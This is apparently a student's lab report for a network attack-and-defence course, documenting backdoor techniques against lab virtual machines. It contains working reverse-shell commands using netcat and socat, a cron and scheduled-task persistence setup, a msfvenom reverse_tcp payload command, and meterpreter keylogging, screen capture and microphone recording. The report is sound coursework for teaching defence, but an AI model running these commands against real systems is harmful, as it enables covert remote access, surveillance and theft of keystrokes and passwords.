20144303石宇森《网络对抗》后门原理与实践 20144303石宇森《网络对抗》 后门原理与实践

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

  • 下载软件时,后门捆绑在下载的软件上,与软件一起安装进入了系统

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • Windows:用户自己运行了后门软件、设置了任务计划启动

  • linux:设置了cron启动,在到达规定的时间时后门启动

(3)Meterpreter有哪些给你映像深刻的功能?

最可怕的就是使用靶机的摄像头进行拍照和录像吧。感觉在电脑前的一举一动都能被攻击主机掌握。另外就是获取目标机键入信息的功能。确实十分强大,攻击方可以掌握我们输入的所有东西,像输入的密码、发送的消息什么的已经不算是秘密了。

细思极恐,好像只要黑客想知道的东西没有他没办法搞定的。我们这样一个简单的后门软件都能有如此强大的功能。应该是学好网络攻防,走遍天下都不怕了。

(4)如何发现自己有系统有没有被安装后门?

简单的方法就是通过杀毒软件杀毒吧。还可以查看进程列表,注册表。

实验总结与体会

实践总结:

  • 通过此次实验,掌握了一下基本内容:
  • Windows如何获取目标主机的shell:使用ncat打开监听端口,目标主机连接到端口时就获得了其shell
  • linux如何获取目标主机的shell:通过命令nc -l -p 打开端口,等待目标主机连接即可获得其shell
  • 学会打开cron启动
  • 掌握打开任务计划启动的方法
  • 掌握生成后门文件的方法,并将其通过ncat或者socat传输给目标主机
  • 了解一些常见的meterpreter命令,并使用一些基本的命令攻击靶机(如使用目标机摄像头、截取目标机屏幕等)

心得体会

完成这次实验后,掌握了打开不同操作系统下打开后门的方法,学会了如何在linux下生成一个后门软件,通过实践熟悉了meterpreter的各个命令的使用方法和功能。另外,通过这次亲身实践,也体会到了黑客软件功能的强大,作为普通计算机用户的我们只要稍不留神,身上的大量信息就有可能被黑客盗取。这也从一方面说明了学好这门课程的重要性,不只是要懂得如何完成攻击,更重要的是要通过学习掌握预防攻击,反抗攻击的方法。真是实践出真知啊!

实验过程记录

一、使用netcat获取主机操作Shell,cron启动:

Windows获取linux的shell:

1、在Windows下查看主机的ip地址

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

2、ncat.exe -l -p 4303 打开监听

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

3、nc 192.168.75.129 4303 -e /bin/sh 在linux下反弹式连接到Windows

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

4、Windows获得了linux的shell

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

linux获得Windows的shell:

1、查看linux的ip地址

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

2、nc -l -p 4303打开监听端口

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

3、ncat.exe -e cmd.exe 192.168.75.128 4303 让Windows连接到linux上

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

4、linux获得了Windows主机的shell

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

cron启动:

1、Windows打开监听端口

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

2、用指令crontab -e 对定时任务进行编辑。将最后一行修改为

45 * * * * /bin/netcat 192.168.75.129 4303 -e /bin/sh

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

3、等到每个小时的45分时,linux会自动打开后门,获取linux的shell

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

二、使用socat获取主机操作Shell, 任务计划启动

1、新建一个触发器,开始任务选择工作站锁定时。

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

2、新建操作,选择启动程序,程序定位到socat.exe,参数填

tcp-listen:4303 exec:cmd.exe,pty,stderr

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

3、按ALT+L锁定计算机用户,使新建的操作触发

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

4、此时,在linux端下使用命令socat - tcp:192.168.75.129:4303连接到Windows主机,获取Windows的shell

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

三、使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1、使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.86.129 LPORT=5215 -f exe > 20144303.exe自动生成一个后门程序

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

2、windows打开监听端口,等待linux传输后门文件

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

3、kali端将后门软件传输给Windows

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

四、使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1、输入msfconsole进入msf控制台

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

2、修改IP地址和端口号

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

3、在windows下打开后门软件

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

4、使用exploit命令对Windows进行攻击

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

5、攻击成功,kali获得了Windows的shell

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

6、screenshot命令截取目标机的屏幕

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

7、使用摄像头拍照、录像。(不知为何失败了)

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

8、使用命令record_mic截取一段音频

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

9、使用命令keyscan_start和keysca_dump捕获靶机的键入信息

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

10、查看当前用户

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

11、查看文件

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

12、命令靶机关机

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践

20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践